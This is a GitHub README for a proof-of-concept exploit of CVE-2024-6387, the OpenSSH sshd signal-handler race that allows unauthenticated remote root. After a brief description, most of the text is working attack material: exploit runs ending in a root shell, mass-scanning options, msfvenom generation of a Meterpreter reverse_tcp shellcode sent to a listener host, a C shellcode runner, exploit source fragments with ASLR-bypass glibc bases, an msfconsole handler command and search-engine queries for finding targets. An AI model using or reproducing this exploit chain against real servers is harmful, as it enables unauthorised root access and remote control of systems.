vuducmanhno100-cloud/CVE-2024-6387

# CVE-2024-6387 CVE-2024-6387 POC (Currently being edited) #  CVE-2024-6387 - PoC ## 📜 Description Remote Unauthenticated Code Execution Vulnerability in OpenSSH server A signal handler race condition was found in OpenSSH's server (sshd), where a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously. However, this signal handler calls various functions that are not async-signal-safe, for example, syslog(). ## 📁 Table of Contents - 📖 [Details](#-details) - ⚙️ [Usage](#-usage) - 🔍 [Host Discovery](#-host-discovery) - 🛠️ [Mitigation](#-mitigation) - 💁 [References](#-references) - 📌 [Author](#-author) - 📢 [Disclaimer](#-disclaimer) ## ✍🏻 Details You can find the technical details [here](https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt). The flaw, discovered by researchers at Qualys in `May 2024`, and assigned the identifier CVE-2024-6387, is due to a signal handler race condition in sshd that allows unauthenticated remote attackers to execute arbitrary code as root. "If a client does not authenticate within LoginGraceTime seconds (120 by default), then sshd's SIGALRM handler is called asynchronously and calls various functions that are not async-signal-safe," "A remote unauthenticated attacker can take advantage of this flaw to execute arbitrary code with root privileges." ## ⚙️ Usage ## Scanning OpenSSH Server $ python3 CVE-2024-6387.py --exploit 192.168.56.101 --port 22 ██████╗ ██████╗ ███████╗███╗ ██╗███████╗███████╗██╗ ██╗ ██╔═══██╗██╔══██╗██╔════╝████╗ ██║██╔════╝██╔════╝██║ ██║ ██║ ██║██████╔╝█████╗ ██╔██╗ ██║███████╗███████╗███████║ ██║ ██║██╔═══╝ ██╔══╝ ██║╚██╗██║╚════██║╚════██║██╔══██║ ╚██████╔╝██║ ███████╗██║ ╚████║███████║███████║██║ ██║ ╚═════╝ ╚═╝ ╚══════╝╚═╝ ╚═══╝╚══════╝╚══════╝╚═╝ ╚═╝ Author: l0n3m4n / Scanner: @xaitax / PoC: @7etsuo Exploiting vulnerabilities... Attempting exploitation with glibc base: 0xb7200000 Attempt 0 of 20000 Received SSH version: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6 Received KEX_INIT (1024 bytes) send_packet: Resource temporarily unavailable send_packet: Resource temporarily unavailable send_packet: Resource temporarily unavailable send_packet: Resource temporarily unavailable ..... Exploitation successful..! ~# whoami && id root uid=0(root) gid=0(root) groups=0(root) ### Exporting (csv,txt,json) $ python3 CVE-2024-6387.py -s 192.168.56.101 -p 22 -o json -f result.json ### Multiple targets $ python3 CVE-2024-6387.py -s targets.txt -p 22 -o json -f result.json ### Adding timeout $ python3 CVE-2024-6387.py -s 192.168.56.101 -p 22 -t 10 -o json -f result.json ### Network ranges $ python3 CVE-2024-6387.py -s 192.168.56.101/24 -p 22 -t 5 -o json -f result.json ### Custom port $ python3 CVE-2024-6387.py -s 192.168.56.101 -p 2244 -t 5 -o json -f result.json # Escalation Process ## Getting Reverse shell # Generating a shellcode $ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=9999 -f c [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 130 bytes Final size of c file: 574 bytes unsigned char buf[] = "\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9" "\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51" "\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01" "\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00" "\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a" "\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74" "\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31" "\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58" "\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0" "\x78\xed\xff\xe6"; ### Custom payload #include // A placeholder of your custom payload const char shellcode[] = "\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9" "\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51" "\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01" "\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00" "\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a" "\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74" "\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31" "\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58" "\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0" "\x78\xed\xff\xe6"; int main() { // Execute shellcode printf("Executing shellcode...\n"); void (*sc)() = (void(*)())shellcode; sc(); return 0; } ### Actual payload #include #define MAX_PACKET_SIZE (256 * 1024) #define LOGIN_GRACE_TIME 120 #define MAX_STARTUPS 100 #define CHUNK_ALIGN(s) (((s) + 15) & ~15) // Possible glibc base addresses (for ASLR bypass) uint64_t GLIBC_BASES[] = { 0xb7200000, 0xb7400000 }; int NUM_GLIBC_BASES = sizeof (GLIBC_BASES) / sizeof (GLIBC_BASES[0]); // Shellcode placeholder (replace with actual shellcode) unsigned char shellcode[] = "\x90\x90\x90\x90"; ### Compiling and initiating payload # compiling payload $ gcc -shared -o exploit.so -fPIC 7etsuo-regreSSHion.c ### Executing payload # Once you receive a successful exploitation message, the msfconsole automatically initiates a Meterpreter session. $ python3 CVE-2024-6387.py --exploit 192.168.56.101 --p 22 ### Catching payload msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 192.168.56.100; set LPORT 9999; exploit -j" ## 🔍 Host Discovery - **Hunter**: `/product.name="OpenSSH"` - **FOFA**: `app="OpenSSH"` - **SHODAN**: `product:"OpenSSH"` - **CENSYS**: `(openssh) and labels=remote-access`